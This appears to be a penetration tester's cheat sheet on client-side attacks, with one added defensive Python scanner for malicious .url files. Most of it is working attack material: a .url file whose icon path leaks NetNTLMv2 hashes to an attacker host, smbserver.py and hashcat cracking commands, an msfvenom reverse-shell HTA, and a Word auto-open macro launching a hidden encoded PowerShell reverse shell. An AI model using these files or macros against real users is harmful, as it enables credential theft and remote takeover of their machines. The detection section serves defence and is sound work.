Client Side Attacks

URL Attack (Formerly SCF)

  • If there is a location users read files from, such as an FTP or SMB share, drop a file like the one below there; once a user clicks it, capture their NetNTLMv2 hash with smbserver.py or Responder, then crack it with Hashcat.

smbserver.py share . -smb2support

  • Contents of the .url file; the IconFile UNC path points at the host running smbserver.py or Responder (192.168.56.128 in this example):

[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\192.168.56.128\%USERNAME%.icon
IconIndex=1
  • Create it as a .txt file and rename it to .url before sending it or placing it in the location the user reads from

hashcat -m 5600 hash.txt /root/rockyou.txt --force
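Defender-side check for the .url trick above, as an added example that is not part of the original notes: it parses a .url file with the standard INI parser and flags any IconFile, URL or WorkingDirectory value that is a UNC path to a host outside an allowlist, which is exactly the property that makes the file leak a hash. The two sample files and the TRUSTED_UNC_HOSTS allowlist are constructed for this example.

```python
import configparser
import ipaddress
import re

# Constructed sample: a .url file like the one above; its IconFile is a UNC path
# to a raw IP, so Explorer authenticates to that host over SMB to fetch the icon.
SUSPICIOUS_URL_FILE = r"""[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\192.168.56.128\%USERNAME%.icon
IconIndex=1
"""
# Constructed sample: an ordinary shortcut with a local icon.
BENIGN_URL_FILE = r"""[InternetShortcut]
URL=https://intranet.example.local/wiki
IconFile=C:\Windows\System32\shell32.dll
IconIndex=13
"""
# Hosts that legitimately serve icons over SMB (assumed allowlist for this example).
TRUSTED_UNC_HOSTS = {"fileserver.corp.example"}
UNC_RE = re.compile(r"^\\\\([^\\]+)(?:\\|$)")  # \\host\share... -> "host"

def unc_host(value: str):
    """Return the host of a UNC path, or None if the value is not UNC."""
    m = UNC_RE.match(value.strip())
    return m.group(1) if m else None

def scan_url_file(text: str) -> list:
    """(key, host, reason) for each value that makes the client talk SMB to an untrusted host."""
    cp = configparser.ConfigParser(interpolation=None)  # keep '%' literal
    cp.read_string(text)
    findings = []
    if not cp.has_section("InternetShortcut"):
        return findings
    for key in ("IconFile", "URL", "WorkingDirectory"):
        value = cp["InternetShortcut"].get(key, "")
        host = unc_host(value)
        if host is None or host.lower() in TRUSTED_UNC_HOSTS:
            continue
        reason = "UNC path to untrusted host"
        try:
            ipaddress.ip_address(host)
            reason = "UNC path to raw IP address"
        except ValueError:
            pass
        if "%USERNAME%" in value.upper():
            reason += "; embeds %USERNAME% (ties the leaked hash to a named user)"
        findings.append((key, host, reason))
    return findings
```

A hit from this scan on a shared location is a reason to quarantine the file and, more generally, to block outbound SMB (TCP 445) at the perimeter so a leaked icon path cannot reach an external listener.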

HTA

  • HTML Applications that get executed by mshta.exe if the user is on IE or Edge (with Edge the user has more security notifications to click through)

msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$PORT -f hta-psh -o shell.hta
  • Host the file with a web server, or upload it to a known place where the user will open it

Macro

  • Create a macro in a Word document that auto-launches on opening and spawns a reverse shell

  • Can use the previous msfvenom command to copy a PowerShell payload, or just use revshells.com

  • Split the PowerShell payload, as a single VBA line cannot hold the full number of characters

# Split the long PowerShell one-liner into n-character chunks, printing one
# VBA concatenation line per chunk so each line stays within the VBA line limit.
payload = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZQB3AC....."
n = 50
for i in range(0, len(payload), n):
    print('Str = Str + "' + payload[i:i + n] + '"')
  • Then paste the generated lines into the macro:

Sub AutoOpen()
		MyMacroName
End Sub

Sub Document_Open()
		MyMacroName
End Sub

Sub MyMacroName()
		Dim Str As String
		
		Str = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZ"
		Str = Str + "QB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQB"
		Str = Str + "TAHQAcgBlAGEAbQAoACwAWwBDAG8AbgB2AGUAcgB0AF0AOgA6A"
		Str = Str + "EYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAEg"
		Str = Str + "ANABzAEkAQQBBAEEAQQBBAEEAQQBFAEEATAAxAFgANgAyACsAY"
		Str = Str + "gBTAEIARAAvAG4ARQBqADUASAAvAGgAZwBDAFoAQwBJAFoAUgB"
		...
		Str = Str + "AZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0Ac"
		Str = Str + "AByAGUAcwBzACkADQAKACQAcwB0AHIAZQBhAG0AIAA9ACAATgB"
		Str = Str + "lAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtA"
		Str = Str + "FIAZQBhAGQAZQByACgAJABnAHoAaQBwACkADQAKAGkAZQB4ACA"
		Str = Str + "AJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAVABvAEUAbgBkACgAK"
		Str = Str + "QA="
		
		CreateObject("Wscript.Shell").Run Str
End Sub
